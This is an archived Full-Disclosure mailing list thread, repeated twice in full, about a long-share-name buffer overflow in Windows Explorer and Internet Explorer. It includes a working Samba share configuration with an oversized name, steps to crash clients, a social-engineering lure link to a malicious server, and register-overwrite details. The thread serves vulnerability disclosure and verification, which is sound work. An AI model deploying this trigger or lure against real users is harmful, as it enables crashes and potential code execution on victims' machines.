KF
27/04/04, 22:55
This crashed IE 5.0.3700.1000 on Win2k SP4
Both the EBP and EIP were overwritten with 0x00410041.
ESP holds the Share name as passed by the server.
ESI holds servers.ip\sharename (tolowered)
I guess its unicode ninjitsu time.
-KF
Milan 't4c' Berger wrote:
> Hello,
>
> I expierenced the same like Daniel.
> Windows 2k all hotfixes and patches installed.
> Machine doesn't crash, just gave me the error
> message "share name not found"
>
> Tested on german Windows 2000 pro SP4/IE6
> tested with Windows Explorer.
>
>
> Regards,
> Milan
>
>
> Daniel Regalado Arias wrote:
>
>> Well, i have tested it in W2k with sp3 and explorer
>> didnt get crashed!!!!!!!
>>
>> Well, i cant get into the share because a message
>> appears saying "share name not found"!!!!
>>
>> But, explorer is OK.
>>
>>
>> --- Rodrigo Gutierrez <rodrigo@intellicomp.cl>
>> escribió: > Sunday afternoon is a bit boring, and
>> weather sucks
>>
>>> down here in Santiago,
>>> Chile so here we go...
>>> The vuln is attached in TXT format, I would be
>>> gratefull if someone could
>>> verify if it affects windows 2003 as well.
>>>
>>> Rodrigo.-
>>>
>>>> Microsoft Explorer and Internet Explorer Long
>>>
>>
>> Share
>>
>>> Name Buffer Overflow.
>>>
>>>
>>>
>>> Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
>>>
>>> Affected: MS Internet Explorer, MS Explorer
>>> (explorer.exe) Windows XP(All), Windows 2000(All)
>>>
>>> Not Tested: Windows 2003, Windows me, Windows 98,
>>> Windows 95
>>>
>>> Vendor Status: i notified the vendor in the
>>> beginning of 2002, this
>>> vulnerability was supposed to be
>>> fixed in xp service
>>> pack 1 according to the vendors
>>> knowledge base article
>>> 322857.
>>>
>>> Vendor url:
>>>
>>
>> http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
>>
>>>
>>>
>>> Background.
>>>
>>> MS Explorer (explorer.exe) and MS Internet
>>> Explorer(IEXPLORE.EXE) are core pieces of Microsoft Windows
>>> Operating Systems.
>>>
>>>
>>>
>>> Description
>>>
>>> Windows fails to handle long share names when
>>> accessing a remote file servers such as samba, allowing a malicious
>>> server to crash the clients explorer and eventually get to execute
>>> arbitrary code in the machine as the current user (usually with
>>> Administrator rights in windows
>>> machines).
>>>
>>>
>>>
>>> Analysis
>>>
>>> In order to exploit this, an attacker must be able
>>> to get a user to connect to a malicious server which contains a
>>> share name
>>> equal or longer than 300
>>> characters, windows wont allow you to create such a
>>> share, but of course samba includes the feature ;). After your
>>> samba box is
>>> up and running create a share in you smb.conf :
>>>
>>>
>>>
>>> #------------ CUT HERE -------------
>>>
>>>
>>
>> [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
>>
>>
>>> comment = Area 51
>>> path = /tmp/testfolder
>>> public = yes
>>> writable = yes
>>> printable = no
>>> browseable = yes
>>> write list = @trymywingchung
>>>
>>> #------------ CUT HERE -------------
>>>
>>>
>>> After your server is up, just get to your windows
>>> test box and get to the
>>> start menu > run > \\your.malicious.server.ip.,
>>> plufff, explorer will crash
>>> :).
>>>
>>> Social Engineering:
>>>
>>> <a href="\\my.malicious.server.ip">Enter My 0day
>>> sploit archive</a>
>>>
>>>
>>>
>>> Workaround.
>>>
>>> From your network card settings disable the client
>>> for Microsoft networks until a real fix for this vulnerability is
>>> available.
>>>
>>
>>
>> __________________________________________________ _______
>> Do You Yahoo!?
>> Información de Estados Unidos y América Latina, en Yahoo! Noticias.
>> Visítanos en http://noticias.espanol.yahoo.com
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>>
>
Both the EBP and EIP were overwritten with 0x00410041.
ESP holds the Share name as passed by the server.
ESI holds servers.ip\sharename (tolowered)
I guess its unicode ninjitsu time.
-KF
Milan 't4c' Berger wrote:
> Hello,
>
> I expierenced the same like Daniel.
> Windows 2k all hotfixes and patches installed.
> Machine doesn't crash, just gave me the error
> message "share name not found"
>
> Tested on german Windows 2000 pro SP4/IE6
> tested with Windows Explorer.
>
>
> Regards,
> Milan
>
>
> Daniel Regalado Arias wrote:
>
>> Well, i have tested it in W2k with sp3 and explorer
>> didnt get crashed!!!!!!!
>>
>> Well, i cant get into the share because a message
>> appears saying "share name not found"!!!!
>>
>> But, explorer is OK.
>>
>>
>> --- Rodrigo Gutierrez <rodrigo@intellicomp.cl>
>> escribió: > Sunday afternoon is a bit boring, and
>> weather sucks
>>
>>> down here in Santiago,
>>> Chile so here we go...
>>> The vuln is attached in TXT format, I would be
>>> gratefull if someone could
>>> verify if it affects windows 2003 as well.
>>>
>>> Rodrigo.-
>>>
>>>> Microsoft Explorer and Internet Explorer Long
>>>
>>
>> Share
>>
>>> Name Buffer Overflow.
>>>
>>>
>>>
>>> Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
>>>
>>> Affected: MS Internet Explorer, MS Explorer
>>> (explorer.exe) Windows XP(All), Windows 2000(All)
>>>
>>> Not Tested: Windows 2003, Windows me, Windows 98,
>>> Windows 95
>>>
>>> Vendor Status: i notified the vendor in the
>>> beginning of 2002, this
>>> vulnerability was supposed to be
>>> fixed in xp service
>>> pack 1 according to the vendors
>>> knowledge base article
>>> 322857.
>>>
>>> Vendor url:
>>>
>>
>> http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
>>
>>>
>>>
>>> Background.
>>>
>>> MS Explorer (explorer.exe) and MS Internet
>>> Explorer(IEXPLORE.EXE) are core pieces of Microsoft Windows
>>> Operating Systems.
>>>
>>>
>>>
>>> Description
>>>
>>> Windows fails to handle long share names when
>>> accessing a remote file servers such as samba, allowing a malicious
>>> server to crash the clients explorer and eventually get to execute
>>> arbitrary code in the machine as the current user (usually with
>>> Administrator rights in windows
>>> machines).
>>>
>>>
>>>
>>> Analysis
>>>
>>> In order to exploit this, an attacker must be able
>>> to get a user to connect to a malicious server which contains a
>>> share name
>>> equal or longer than 300
>>> characters, windows wont allow you to create such a
>>> share, but of course samba includes the feature ;). After your
>>> samba box is
>>> up and running create a share in you smb.conf :
>>>
>>>
>>>
>>> #------------ CUT HERE -------------
>>>
>>>
>>
>> [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
>>
>>
>>> comment = Area 51
>>> path = /tmp/testfolder
>>> public = yes
>>> writable = yes
>>> printable = no
>>> browseable = yes
>>> write list = @trymywingchung
>>>
>>> #------------ CUT HERE -------------
>>>
>>>
>>> After your server is up, just get to your windows
>>> test box and get to the
>>> start menu > run > \\your.malicious.server.ip.,
>>> plufff, explorer will crash
>>> :).
>>>
>>> Social Engineering:
>>>
>>> <a href="\\my.malicious.server.ip">Enter My 0day
>>> sploit archive</a>
>>>
>>>
>>>
>>> Workaround.
>>>
>>> From your network card settings disable the client
>>> for Microsoft networks until a real fix for this vulnerability is
>>> available.
>>>
>>
>>
>> __________________________________________________ _______
>> Do You Yahoo!?
>> Información de Estados Unidos y América Latina, en Yahoo! Noticias.
>> Visítanos en http://noticias.espanol.yahoo.com
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>>
>